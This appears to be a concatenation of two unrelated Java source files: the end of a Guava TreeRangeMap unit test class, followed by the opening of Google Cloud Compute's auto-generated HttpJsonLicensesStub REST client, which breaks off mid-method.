testSpanSingleRange() { for (Range<Integer> range : RANGES) { RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(range, 1); try { assertEquals(range, rangeMap.span()); assertFalse(range.isEmpty()); } catch (NoSuchElementException e) { assertTrue(range.isEmpty()); } } } public void testSpanTwoRanges() { for (Range<Integer> range1 : RANGES) { for (Range<Integer> range2 : RANGES) { RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(range1, 1); rangeMap.put(range2, 2); Range<Integer> expected; if (range1.isEmpty()) { if (range2.isEmpty()) { expected = null; } else { expected = range2; } } else { if (range2.isEmpty()) { expected = range1; } else { expected = range1.span(range2); } } try { assertEquals(expected, rangeMap.span()); assertNotNull(expected); } catch (NoSuchElementException e) { assertNull(expected); } } } } public void testAllRangesAlone() { for (Range<Integer> range : RANGES) { Map<Integer, Integer> model = new HashMap<>(); putModel(model, range, 1); RangeMap<Integer, Integer> test = TreeRangeMap.create(); test.put(range, 1); verify(model, test); } } public void testAllRangePairs() { for (Range<Integer> range1 : RANGES) { for (Range<Integer> range2 : RANGES) { Map<Integer, Integer> model = new HashMap<>(); putModel(model, range1, 1); putModel(model, range2, 2); RangeMap<Integer, Integer> test = TreeRangeMap.create(); test.put(range1, 1); test.put(range2, 2); verify(model, test); } } } public void testAllRangeTriples() { for (Range<Integer> range1 : RANGES) { for (Range<Integer> range2 : RANGES) { for (Range<Integer> range3 : RANGES) { Map<Integer, Integer> model = new HashMap<>(); putModel(model, range1, 1); putModel(model, range2, 2); putModel(model, range3, 3); RangeMap<Integer, Integer> test = TreeRangeMap.create(); test.put(range1, 1); test.put(range2, 2); test.put(range3, 3); verify(model, test); } } } } public void testPutAll() { for (Range<Integer> range1 : RANGES) { for (Range<Integer> range2 : RANGES) { 
for (Range<Integer> range3 : RANGES) { Map<Integer, Integer> model = new HashMap<>(); putModel(model, range1, 1); putModel(model, range2, 2); putModel(model, range3, 3); RangeMap<Integer, Integer> test = TreeRangeMap.create(); RangeMap<Integer, Integer> test2 = TreeRangeMap.create(); // put range2 and range3 into test2, and then put test2 into test test.put(range1, 1); test2.put(range2, 2); test2.put(range3, 3); test.putAll(test2); verify(model, test); } } } } public void testPutAndRemove() { for (Range<Integer> rangeToPut : RANGES) { for (Range<Integer> rangeToRemove : RANGES) { Map<Integer, Integer> model = new HashMap<>(); putModel(model, rangeToPut, 1); removeModel(model, rangeToRemove); RangeMap<Integer, Integer> test = TreeRangeMap.create(); test.put(rangeToPut, 1); test.remove(rangeToRemove); verify(model, test); } } } public void testPutTwoAndRemove() { for (Range<Integer> rangeToPut1 : RANGES) { for (Range<Integer> rangeToPut2 : RANGES) { for (Range<Integer> rangeToRemove : RANGES) { Map<Integer, Integer> model = new HashMap<>(); putModel(model, rangeToPut1, 1); putModel(model, rangeToPut2, 2); removeModel(model, rangeToRemove); RangeMap<Integer, Integer> test = TreeRangeMap.create(); test.put(rangeToPut1, 1); test.put(rangeToPut2, 2); test.remove(rangeToRemove); verify(model, test); } } } } // identical to testPutTwoAndRemove, // verifies that putCoalescing() doesn't cause any mappings to change relative to put() public void testPutCoalescingTwoAndRemove() { for (Range<Integer> rangeToPut1 : RANGES) { for (Range<Integer> rangeToPut2 : RANGES) { for (Range<Integer> rangeToRemove : RANGES) { Map<Integer, Integer> model = new HashMap<>(); putModel(model, rangeToPut1, 1); putModel(model, rangeToPut2, 2); removeModel(model, rangeToRemove); RangeMap<Integer, Integer> test = TreeRangeMap.create(); test.putCoalescing(rangeToPut1, 1); test.putCoalescing(rangeToPut2, 2); test.remove(rangeToRemove); verify(model, test); } } } } public void testPutCoalescing() { // 
{[0..1): 1, [1..2): 1, [2..3): 2} -> {[0..2): 1, [2..3): 2} RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.putCoalescing(Range.closedOpen(0, 1), 1); rangeMap.putCoalescing(Range.closedOpen(1, 2), 1); rangeMap.putCoalescing(Range.closedOpen(2, 3), 2); assertEquals( ImmutableMap.of(Range.closedOpen(0, 2), 1, Range.closedOpen(2, 3), 2), rangeMap.asMapOfRanges()); } public void testPutCoalescingEmpty() { RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(Range.closedOpen(0, 1), 1); rangeMap.put(Range.closedOpen(1, 2), 1); assertEquals( ImmutableMap.of(Range.closedOpen(0, 1), 1, Range.closedOpen(1, 2), 1), rangeMap.asMapOfRanges()); rangeMap.putCoalescing(Range.closedOpen(1, 1), 1); // empty range coalesces connected ranges assertEquals(ImmutableMap.of(Range.closedOpen(0, 2), 1), rangeMap.asMapOfRanges()); } public void testPutCoalescingSubmapEmpty() { RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(Range.closedOpen(0, 1), 1); rangeMap.put(Range.closedOpen(1, 2), 1); assertEquals( ImmutableMap.of(Range.closedOpen(0, 1), 1, Range.closedOpen(1, 2), 1), rangeMap.asMapOfRanges()); RangeMap<Integer, Integer> subRangeMap = rangeMap.subRangeMap(Range.closedOpen(0, 2)); subRangeMap.putCoalescing(Range.closedOpen(1, 1), 1); // empty range coalesces connected ranges assertEquals(ImmutableMap.of(Range.closedOpen(0, 2), 1), subRangeMap.asMapOfRanges()); assertEquals(ImmutableMap.of(Range.closedOpen(0, 2), 1), rangeMap.asMapOfRanges()); } public void testPutCoalescingComplex() { // {[0..1): 1, [1..3): 1, [3..5): 1, [7..10): 2, [12..15): 2, [18..19): 3} RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(Range.closedOpen(0, 1), 1); rangeMap.put(Range.closedOpen(1, 3), 1); rangeMap.put(Range.closedOpen(3, 5), 1); rangeMap.put(Range.closedOpen(7, 10), 2); rangeMap.put(Range.closedOpen(12, 15), 2); rangeMap.put(Range.closedOpen(18, 19), 3); rangeMap.putCoalescing(Range.closedOpen(-5, -4), 0); 
// disconnected rangeMap.putCoalescing(Range.closedOpen(-6, -5), 0); // lower than minimum rangeMap.putCoalescing(Range.closedOpen(2, 4), 1); // between rangeMap.putCoalescing(Range.closedOpen(9, 14), 0); // different value rangeMap.putCoalescing(Range.closedOpen(17, 20), 3); // enclosing rangeMap.putCoalescing(Range.closedOpen(22, 23), 4); // disconnected rangeMap.putCoalescing(Range.closedOpen(23, 25), 4); // greater than minimum // {[-6..-4): 0, [0..1): 1, [1..5): 1, [7..9): 2, // [9..14): 0, [14..15): 2, [17..20): 3, [22..25): 4} assertEquals( new ImmutableMap.Builder<>() .put(Range.closedOpen(-6, -4), 0) .put(Range.closedOpen(0, 1), 1) // not coalesced .put(Range.closedOpen(1, 5), 1) .put(Range.closedOpen(7, 9), 2) .put(Range.closedOpen(9, 14), 0) .put(Range.closedOpen(14, 15), 2) .put(Range.closedOpen(17, 20), 3) .put(Range.closedOpen(22, 25), 4) .build(), rangeMap.asMapOfRanges()); } public void testMergeOntoRangeOverlappingLowerBound() { // {[0..2): 1} RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(Range.closedOpen(0, 2), 1); rangeMap.merge(Range.closedOpen(1, 3), 2, Integer::sum); // {[0..1): 1, [1..2): 3, [2, 3): 2} assertEquals( new ImmutableMap.Builder<>() .put(Range.closedOpen(0, 1), 1) .put(Range.closedOpen(1, 2), 3) .put(Range.closedOpen(2, 3), 2) .build(), rangeMap.asMapOfRanges()); } public void testMergeOntoRangeOverlappingUpperBound() { // {[1..3): 1} RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(Range.closedOpen(1, 3), 1); rangeMap.merge(Range.closedOpen(0, 2), 2, Integer::sum); // {[0..1): 2, [1..2): 3, [2, 3): 1} assertEquals( new ImmutableMap.Builder<>() .put(Range.closedOpen(0, 1), 2) .put(Range.closedOpen(1, 2), 3) .put(Range.closedOpen(2, 3), 1) .build(), rangeMap.asMapOfRanges()); } public void testMergeOntoIdenticalRange() { // {[0..1): 1} RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(Range.closedOpen(0, 1), 1); rangeMap.merge(Range.closedOpen(0, 1), 2, 
Integer::sum); // {[0..1): 3} assertEquals(ImmutableMap.of(Range.closedOpen(0, 1), 3), rangeMap.asMapOfRanges()); } public void testMergeOntoSuperRange() { // {[0..3): 1} RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(Range.closedOpen(0, 3), 1); rangeMap.merge(Range.closedOpen(1, 2), 2, Integer::sum); // {[0..1): 1, [1..2): 3, [2..3): 1} assertEquals( new ImmutableMap.Builder<>() .put(Range.closedOpen(0, 1), 1) .put(Range.closedOpen(1, 2), 3) .put(Range.closedOpen(2, 3), 1) .build(), rangeMap.asMapOfRanges()); } public void testMergeOntoSubRange() { // {[1..2): 1} RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(Range.closedOpen(1, 2), 1); rangeMap.merge(Range.closedOpen(0, 3), 2, Integer::sum); // {[0..1): 2, [1..2): 3, [2..3): 2} assertEquals( new ImmutableMap.Builder<>() .put(Range.closedOpen(0, 1), 2) .put(Range.closedOpen(1, 2), 3) .put(Range.closedOpen(2, 3), 2) .build(), rangeMap.asMapOfRanges()); } public void testMergeOntoDisconnectedRanges() { // {[0..1): 1, [2, 3): 2} RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(Range.closedOpen(0, 1), 1); rangeMap.put(Range.closedOpen(2, 3), 2); rangeMap.merge(Range.closedOpen(0, 3), 3, Integer::sum); // {[0..1): 4, [1..2): 3, [2..3): 5} assertEquals( new ImmutableMap.Builder<>() .put(Range.closedOpen(0, 1), 4) .put(Range.closedOpen(1, 2), 3) .put(Range.closedOpen(2, 3), 5) .build(), rangeMap.asMapOfRanges()); } public void testMergeNullValue() { // {[1..2): 1, [3, 4): 2} RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(Range.closedOpen(1, 2), 1); rangeMap.put(Range.closedOpen(3, 4), 2); rangeMap.merge(Range.closedOpen(0, 5), null, (v1, v2) -> v1 + 1); // {[1..2): 2, [3..4): 3} assertEquals( new ImmutableMap.Builder<>() .put(Range.closedOpen(1, 2), 2) .put(Range.closedOpen(3, 4), 3) .build(), rangeMap.asMapOfRanges()); } public void testMergeWithRemappingFunctionReturningNullValue() { // {[1..2): 1, [3, 4): 2} 
RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(Range.closedOpen(1, 2), 1); rangeMap.put(Range.closedOpen(3, 4), 2); rangeMap.merge(Range.closedOpen(0, 5), 3, (v1, v2) -> null); // {[0..1): 3, [2..3): 3, [4, 5): 3} assertEquals( new ImmutableMap.Builder<>() .put(Range.closedOpen(0, 1), 3) .put(Range.closedOpen(2, 3), 3) .put(Range.closedOpen(4, 5), 3) .build(), rangeMap.asMapOfRanges()); } public void testMergeAllRangeTriples() { for (Range<Integer> range1 : RANGES) { for (Range<Integer> range2 : RANGES) { for (Range<Integer> range3 : RANGES) { Map<Integer, Integer> model = new HashMap<>(); mergeModel(model, range1, 1, Integer::sum); mergeModel(model, range2, 2, Integer::sum); mergeModel(model, range3, 3, Integer::sum); RangeMap<Integer, Integer> test = TreeRangeMap.create(); test.merge(range1, 1, Integer::sum); test.merge(range2, 2, Integer::sum); test.merge(range3, 3, Integer::sum); verify(model, test); } } } } public void testSubRangeMapExhaustive() { for (Range<Integer> range1 : RANGES) { for (Range<Integer> range2 : RANGES) { RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(range1, 1); rangeMap.put(range2, 2); for (Range<Integer> subRange : RANGES) { RangeMap<Integer, Integer> expected = TreeRangeMap.create(); for (Entry<Range<Integer>, Integer> entry : rangeMap.asMapOfRanges().entrySet()) { if (entry.getKey().isConnected(subRange)) { expected.put(entry.getKey().intersection(subRange), entry.getValue()); } } RangeMap<Integer, Integer> subRangeMap = rangeMap.subRangeMap(subRange); assertEquals(expected, subRangeMap); assertEquals(expected.asMapOfRanges(), subRangeMap.asMapOfRanges()); assertEquals(expected.asDescendingMapOfRanges(), subRangeMap.asDescendingMapOfRanges()); assertEquals( ImmutableList.copyOf(subRangeMap.asMapOfRanges().entrySet()).reverse(), ImmutableList.copyOf(subRangeMap.asDescendingMapOfRanges().entrySet())); if (!expected.asMapOfRanges().isEmpty()) { assertEquals(expected.span(), 
subRangeMap.span()); } for (int i = MIN_BOUND; i <= MAX_BOUND; i++) { assertEquals(expected.get(i), subRangeMap.get(i)); } for (Range<Integer> query : RANGES) { assertEquals( expected.asMapOfRanges().get(query), subRangeMap.asMapOfRanges().get(query)); } } } } } public void testSubSubRangeMap() { RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(Range.open(3, 7), 1); rangeMap.put(Range.closed(9, 10), 2); rangeMap.put(Range.closed(12, 16), 3); RangeMap<Integer, Integer> sub1 = rangeMap.subRangeMap(Range.closed(5, 11)); assertEquals( ImmutableMap.of(Range.closedOpen(5, 7), 1, Range.closed(9, 10), 2), sub1.asMapOfRanges()); RangeMap<Integer, Integer> sub2 = sub1.subRangeMap(Range.open(6, 15)); assertEquals( ImmutableMap.of(Range.open(6, 7), 1, Range.closed(9, 10), 2), sub2.asMapOfRanges()); } public void testSubRangeMapPut() { RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(Range.open(3, 7), 1); rangeMap.put(Range.closed(9, 10), 2); rangeMap.put(Range.closed(12, 16), 3); RangeMap<Integer, Integer> sub = rangeMap.subRangeMap(Range.closed(5, 11)); assertEquals( ImmutableMap.of(Range.closedOpen(5, 7), 1, Range.closed(9, 10), 2), sub.asMapOfRanges()); sub.put(Range.closed(7, 9), 4); assertEquals( ImmutableMap.of( Range.closedOpen(5, 7), 1, Range.closed(7, 9), 4, Range.openClosed(9, 10), 2), sub.asMapOfRanges()); assertEquals( ImmutableMap.of( Range.open(3, 7), 1, Range.closed(7, 9), 4, Range.openClosed(9, 10), 2, Range.closed(12, 16), 3), rangeMap.asMapOfRanges()); assertThrows(IllegalArgumentException.class, () -> sub.put(Range.open(9, 12), 5)); RangeMap<Integer, Integer> subSub = sub.subRangeMap(Range.closedOpen(5, 5)); subSub.put(Range.closedOpen(5, 5), 6); // should be a no-op assertEquals( ImmutableMap.of( Range.open(3, 7), 1, Range.closed(7, 9), 4, Range.openClosed(9, 10), 2, Range.closed(12, 16), 3), rangeMap.asMapOfRanges()); } public void testSubRangeMapPutCoalescing() { RangeMap<Integer, Integer> rangeMap = 
TreeRangeMap.create(); rangeMap.put(Range.open(3, 7), 1); rangeMap.put(Range.closed(9, 10), 2); rangeMap.put(Range.closed(12, 16), 3); RangeMap<Integer, Integer> sub = rangeMap.subRangeMap(Range.closed(5, 11)); assertEquals( ImmutableMap.of(Range.closedOpen(5, 7), 1, Range.closed(9, 10), 2), sub.asMapOfRanges()); sub.putCoalescing(Range.closed(7, 9), 2); assertEquals( ImmutableMap.of(Range.closedOpen(5, 7), 1, Range.closed(7, 10), 2), sub.asMapOfRanges()); assertEquals( ImmutableMap.of(Range.open(3, 7), 1, Range.closed(7, 10), 2, Range.closed(12, 16), 3), rangeMap.asMapOfRanges()); sub.putCoalescing(Range.singleton(7), 1); assertEquals( ImmutableMap.of(Range.closed(5, 7), 1, Range.openClosed(7, 10), 2), sub.asMapOfRanges()); assertEquals( ImmutableMap.of( Range.open(3, 5), 1, Range.closed(5, 7), 1, Range.openClosed(7, 10), 2, Range.closed(12, 16), 3), rangeMap.asMapOfRanges()); assertThrows(IllegalArgumentException.class, () -> sub.putCoalescing(Range.open(9, 12), 5)); } public void testSubRangeMapRemove() { RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(Range.open(3, 7), 1); rangeMap.put(Range.closed(9, 10), 2); rangeMap.put(Range.closed(12, 16), 3); RangeMap<Integer, Integer> sub = rangeMap.subRangeMap(Range.closed(5, 11)); assertEquals( ImmutableMap.of(Range.closedOpen(5, 7), 1, Range.closed(9, 10), 2), sub.asMapOfRanges()); sub.remove(Range.closed(7, 9)); assertEquals( ImmutableMap.of(Range.closedOpen(5, 7), 1, Range.openClosed(9, 10), 2), sub.asMapOfRanges()); assertEquals( ImmutableMap.of(Range.open(3, 7), 1, Range.openClosed(9, 10), 2, Range.closed(12, 16), 3), rangeMap.asMapOfRanges()); sub.remove(Range.closed(3, 9)); assertEquals(ImmutableMap.of(Range.openClosed(9, 10), 2), sub.asMapOfRanges()); assertEquals( ImmutableMap.of(Range.open(3, 5), 1, Range.openClosed(9, 10), 2, Range.closed(12, 16), 3), rangeMap.asMapOfRanges()); } public void testSubRangeMapClear() { RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); 
rangeMap.put(Range.open(3, 7), 1); rangeMap.put(Range.closed(9, 10), 2); rangeMap.put(Range.closed(12, 16), 3); RangeMap<Integer, Integer> sub = rangeMap.subRangeMap(Range.closed(5, 11)); sub.clear(); assertEquals( ImmutableMap.of(Range.open(3, 5), 1, Range.closed(12, 16), 3), rangeMap.asMapOfRanges()); } public void testCopyOfTreeRangeMap() { RangeMap<Integer, Integer> rangeMap = TreeRangeMap.create(); rangeMap.put(Range.open(3, 7), 1); rangeMap.put(Range.closed(9, 10), 2); rangeMap.put(Range.closed(12, 16), 3); RangeMap<Integer, Integer> copy = TreeRangeMap.copyOf(rangeMap); assertEquals(rangeMap.asMapOfRanges(), copy.asMapOfRanges()); } public void testCopyOfImmutableRangeMap() { ImmutableRangeMap<Integer, Integer> rangeMap = ImmutableRangeMap.<Integer, Integer>builder() .put(Range.open(3, 7), 1) .put(Range.closed(9, 10), 2) .put(Range.closed(12, 16), 3) .build(); RangeMap<Integer, Integer> copy = TreeRangeMap.copyOf(rangeMap); assertEquals(rangeMap.asMapOfRanges(), copy.asMapOfRanges()); } // Overriding testEquals because it seems that we get spurious failures when it things empty // should be unequal to empty. 
public void testEquals() { TreeRangeMap<Integer, Integer> empty = TreeRangeMap.create(); TreeRangeMap<Integer, Integer> nonEmpty = TreeRangeMap.create(); nonEmpty.put(Range.all(), 1); TreeRangeMap<Integer, Integer> coalesced = TreeRangeMap.create(); coalesced.put(Range.atLeast(1), 1); coalesced.putCoalescing(Range.atMost(1), 1); TreeRangeMap<Integer, Integer> differentValues = TreeRangeMap.create(); differentValues.put(Range.closedOpen(1, 2), 2); differentValues.put(Range.closedOpen(3, 4), 2); TreeRangeMap<Double, Integer> differentTypes = TreeRangeMap.create(); differentTypes.put(Range.closedOpen(1.0, 2.0), 2); differentTypes.put(Range.closedOpen(3.0, 4.0), 2); new EqualsTester() .addEqualityGroup(empty, TreeRangeMap.<Integer, Integer>create()) .addEqualityGroup(nonEmpty, coalesced) .addEqualityGroup(differentValues) .addEqualityGroup(differentTypes) .testEquals(); } private void verify(Map<Integer, Integer> model, RangeMap<Integer, Integer> test) { for (int i = MIN_BOUND - 1; i <= MAX_BOUND + 1; i++) { assertEquals(model.get(i), test.get(i)); Entry<Range<Integer>, Integer> entry = test.getEntry(i); assertEquals(model.containsKey(i), entry != null); if (entry != null) { assertTrue(test.asMapOfRanges().entrySet().contains(entry)); } } for (Range<Integer> range : test.asMapOfRanges().keySet()) { assertFalse(range.isEmpty()); } } private static void putModel(Map<Integer, Integer> model, Range<Integer> range, int value) { for (int i = MIN_BOUND - 1; i <= MAX_BOUND + 1; i++) { if (range.contains(i)) { model.put(i, value); } } } private static void removeModel(Map<Integer, Integer> model, Range<Integer> range) { for (int i = MIN_BOUND - 1; i <= MAX_BOUND + 1; i++) { if (range.contains(i)) { model.remove(i); } } } private static void mergeModel( Map<Integer, Integer> model, Range<Integer> range, int value, BiFunction<? super Integer, ? super Integer, ? 
extends Integer> remappingFunction) { for (int i = MIN_BOUND - 1; i <= MAX_BOUND + 1; i++) { if (range.contains(i)) { model.merge(i, value, remappingFunction); } } } }
googleapis/google-cloud-java
36,102
java-compute/google-cloud-compute/src/main/java/com/google/cloud/compute/v1/stub/HttpJsonLicensesStub.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.google.cloud.compute.v1.stub; import static com.google.cloud.compute.v1.LicensesClient.ListPagedResponse; import com.google.api.core.InternalApi; import com.google.api.gax.core.BackgroundResource; import com.google.api.gax.core.BackgroundResourceAggregation; import com.google.api.gax.httpjson.ApiMethodDescriptor; import com.google.api.gax.httpjson.HttpJsonCallSettings; import com.google.api.gax.httpjson.HttpJsonOperationSnapshot; import com.google.api.gax.httpjson.HttpJsonStubCallableFactory; import com.google.api.gax.httpjson.ProtoMessageRequestFormatter; import com.google.api.gax.httpjson.ProtoMessageResponseParser; import com.google.api.gax.httpjson.ProtoRestSerializer; import com.google.api.gax.rpc.ClientContext; import com.google.api.gax.rpc.OperationCallable; import com.google.api.gax.rpc.RequestParamsBuilder; import com.google.api.gax.rpc.UnaryCallable; import com.google.cloud.compute.v1.DeleteLicenseRequest; import com.google.cloud.compute.v1.GetIamPolicyLicenseRequest; import com.google.cloud.compute.v1.GetLicenseRequest; import com.google.cloud.compute.v1.InsertLicenseRequest; import com.google.cloud.compute.v1.License; import com.google.cloud.compute.v1.LicensesListResponse; import com.google.cloud.compute.v1.ListLicensesRequest; import com.google.cloud.compute.v1.Operation; import com.google.cloud.compute.v1.Operation.Status; import com.google.cloud.compute.v1.Policy; import 
com.google.cloud.compute.v1.SetIamPolicyLicenseRequest; import com.google.cloud.compute.v1.TestIamPermissionsLicenseRequest; import com.google.cloud.compute.v1.TestPermissionsResponse; import com.google.cloud.compute.v1.UpdateLicenseRequest; import com.google.protobuf.TypeRegistry; import java.io.IOException; import java.util.ArrayList; import java.util.HashMap; import java.util.List; import java.util.Map; import java.util.concurrent.TimeUnit; import javax.annotation.Generated; // AUTO-GENERATED DOCUMENTATION AND CLASS. /** * REST stub implementation for the Licenses service API. * * <p>This class is for advanced usage and reflects the underlying API directly. */ @Generated("by gapic-generator-java") public class HttpJsonLicensesStub extends LicensesStub { private static final TypeRegistry typeRegistry = TypeRegistry.newBuilder().add(Operation.getDescriptor()).build(); private static final ApiMethodDescriptor<DeleteLicenseRequest, Operation> deleteMethodDescriptor = ApiMethodDescriptor.<DeleteLicenseRequest, Operation>newBuilder() .setFullMethodName("google.cloud.compute.v1.Licenses/Delete") .setHttpMethod("DELETE") .setType(ApiMethodDescriptor.MethodType.UNARY) .setRequestFormatter( ProtoMessageRequestFormatter.<DeleteLicenseRequest>newBuilder() .setPath( "/compute/v1/projects/{project}/global/licenses/{license}", request -> { Map<String, String> fields = new HashMap<>(); ProtoRestSerializer<DeleteLicenseRequest> serializer = ProtoRestSerializer.create(); serializer.putPathParam(fields, "license", request.getLicense()); serializer.putPathParam(fields, "project", request.getProject()); return fields; }) .setQueryParamsExtractor( request -> { Map<String, List<String>> fields = new HashMap<>(); ProtoRestSerializer<DeleteLicenseRequest> serializer = ProtoRestSerializer.create(); if (request.hasRequestId()) { serializer.putQueryParam(fields, "requestId", request.getRequestId()); } return fields; }) .setRequestBodyExtractor(request -> null) .build()) .setResponseParser( 
ProtoMessageResponseParser.<Operation>newBuilder() .setDefaultInstance(Operation.getDefaultInstance()) .setDefaultTypeRegistry(typeRegistry) .build()) .setOperationSnapshotFactory( (DeleteLicenseRequest request, Operation response) -> { StringBuilder opName = new StringBuilder(response.getName()); opName.append(":").append(request.getProject()); return HttpJsonOperationSnapshot.newBuilder() .setName(opName.toString()) .setMetadata(response) .setDone(Status.DONE.equals(response.getStatus())) .setResponse(response) .setError(response.getHttpErrorStatusCode(), response.getHttpErrorMessage()) .build(); }) .build(); private static final ApiMethodDescriptor<GetLicenseRequest, License> getMethodDescriptor = ApiMethodDescriptor.<GetLicenseRequest, License>newBuilder() .setFullMethodName("google.cloud.compute.v1.Licenses/Get") .setHttpMethod("GET") .setType(ApiMethodDescriptor.MethodType.UNARY) .setRequestFormatter( ProtoMessageRequestFormatter.<GetLicenseRequest>newBuilder() .setPath( "/compute/v1/projects/{project}/global/licenses/{license}", request -> { Map<String, String> fields = new HashMap<>(); ProtoRestSerializer<GetLicenseRequest> serializer = ProtoRestSerializer.create(); serializer.putPathParam(fields, "license", request.getLicense()); serializer.putPathParam(fields, "project", request.getProject()); return fields; }) .setQueryParamsExtractor( request -> { Map<String, List<String>> fields = new HashMap<>(); ProtoRestSerializer<GetLicenseRequest> serializer = ProtoRestSerializer.create(); return fields; }) .setRequestBodyExtractor(request -> null) .build()) .setResponseParser( ProtoMessageResponseParser.<License>newBuilder() .setDefaultInstance(License.getDefaultInstance()) .setDefaultTypeRegistry(typeRegistry) .build()) .build(); private static final ApiMethodDescriptor<GetIamPolicyLicenseRequest, Policy> getIamPolicyMethodDescriptor = ApiMethodDescriptor.<GetIamPolicyLicenseRequest, Policy>newBuilder() 
.setFullMethodName("google.cloud.compute.v1.Licenses/GetIamPolicy") .setHttpMethod("GET") .setType(ApiMethodDescriptor.MethodType.UNARY) .setRequestFormatter( ProtoMessageRequestFormatter.<GetIamPolicyLicenseRequest>newBuilder() .setPath( "/compute/v1/projects/{project}/global/licenses/{resource}/getIamPolicy", request -> { Map<String, String> fields = new HashMap<>(); ProtoRestSerializer<GetIamPolicyLicenseRequest> serializer = ProtoRestSerializer.create(); serializer.putPathParam(fields, "project", request.getProject()); serializer.putPathParam(fields, "resource", request.getResource()); return fields; }) .setQueryParamsExtractor( request -> { Map<String, List<String>> fields = new HashMap<>(); ProtoRestSerializer<GetIamPolicyLicenseRequest> serializer = ProtoRestSerializer.create(); if (request.hasOptionsRequestedPolicyVersion()) { serializer.putQueryParam( fields, "optionsRequestedPolicyVersion", request.getOptionsRequestedPolicyVersion()); } return fields; }) .setRequestBodyExtractor(request -> null) .build()) .setResponseParser( ProtoMessageResponseParser.<Policy>newBuilder() .setDefaultInstance(Policy.getDefaultInstance()) .setDefaultTypeRegistry(typeRegistry) .build()) .build(); private static final ApiMethodDescriptor<InsertLicenseRequest, Operation> insertMethodDescriptor = ApiMethodDescriptor.<InsertLicenseRequest, Operation>newBuilder() .setFullMethodName("google.cloud.compute.v1.Licenses/Insert") .setHttpMethod("POST") .setType(ApiMethodDescriptor.MethodType.UNARY) .setRequestFormatter( ProtoMessageRequestFormatter.<InsertLicenseRequest>newBuilder() .setPath( "/compute/v1/projects/{project}/global/licenses", request -> { Map<String, String> fields = new HashMap<>(); ProtoRestSerializer<InsertLicenseRequest> serializer = ProtoRestSerializer.create(); serializer.putPathParam(fields, "project", request.getProject()); return fields; }) .setQueryParamsExtractor( request -> { Map<String, List<String>> fields = new HashMap<>(); 
ProtoRestSerializer<InsertLicenseRequest> serializer = ProtoRestSerializer.create(); if (request.hasRequestId()) { serializer.putQueryParam(fields, "requestId", request.getRequestId()); } return fields; }) .setRequestBodyExtractor( request -> ProtoRestSerializer.create() .toBody("licenseResource", request.getLicenseResource(), false)) .build()) .setResponseParser( ProtoMessageResponseParser.<Operation>newBuilder() .setDefaultInstance(Operation.getDefaultInstance()) .setDefaultTypeRegistry(typeRegistry) .build()) .setOperationSnapshotFactory( (InsertLicenseRequest request, Operation response) -> { StringBuilder opName = new StringBuilder(response.getName()); opName.append(":").append(request.getProject()); return HttpJsonOperationSnapshot.newBuilder() .setName(opName.toString()) .setMetadata(response) .setDone(Status.DONE.equals(response.getStatus())) .setResponse(response) .setError(response.getHttpErrorStatusCode(), response.getHttpErrorMessage()) .build(); }) .build(); private static final ApiMethodDescriptor<ListLicensesRequest, LicensesListResponse> listMethodDescriptor = ApiMethodDescriptor.<ListLicensesRequest, LicensesListResponse>newBuilder() .setFullMethodName("google.cloud.compute.v1.Licenses/List") .setHttpMethod("GET") .setType(ApiMethodDescriptor.MethodType.UNARY) .setRequestFormatter( ProtoMessageRequestFormatter.<ListLicensesRequest>newBuilder() .setPath( "/compute/v1/projects/{project}/global/licenses", request -> { Map<String, String> fields = new HashMap<>(); ProtoRestSerializer<ListLicensesRequest> serializer = ProtoRestSerializer.create(); serializer.putPathParam(fields, "project", request.getProject()); return fields; }) .setQueryParamsExtractor( request -> { Map<String, List<String>> fields = new HashMap<>(); ProtoRestSerializer<ListLicensesRequest> serializer = ProtoRestSerializer.create(); if (request.hasFilter()) { serializer.putQueryParam(fields, "filter", request.getFilter()); } if (request.hasMaxResults()) { serializer.putQueryParam( 
fields, "maxResults", request.getMaxResults()); } if (request.hasOrderBy()) { serializer.putQueryParam(fields, "orderBy", request.getOrderBy()); } if (request.hasPageToken()) { serializer.putQueryParam(fields, "pageToken", request.getPageToken()); } if (request.hasReturnPartialSuccess()) { serializer.putQueryParam( fields, "returnPartialSuccess", request.getReturnPartialSuccess()); } return fields; }) .setRequestBodyExtractor(request -> null) .build()) .setResponseParser( ProtoMessageResponseParser.<LicensesListResponse>newBuilder() .setDefaultInstance(LicensesListResponse.getDefaultInstance()) .setDefaultTypeRegistry(typeRegistry) .build()) .build(); private static final ApiMethodDescriptor<SetIamPolicyLicenseRequest, Policy> setIamPolicyMethodDescriptor = ApiMethodDescriptor.<SetIamPolicyLicenseRequest, Policy>newBuilder() .setFullMethodName("google.cloud.compute.v1.Licenses/SetIamPolicy") .setHttpMethod("POST") .setType(ApiMethodDescriptor.MethodType.UNARY) .setRequestFormatter( ProtoMessageRequestFormatter.<SetIamPolicyLicenseRequest>newBuilder() .setPath( "/compute/v1/projects/{project}/global/licenses/{resource}/setIamPolicy", request -> { Map<String, String> fields = new HashMap<>(); 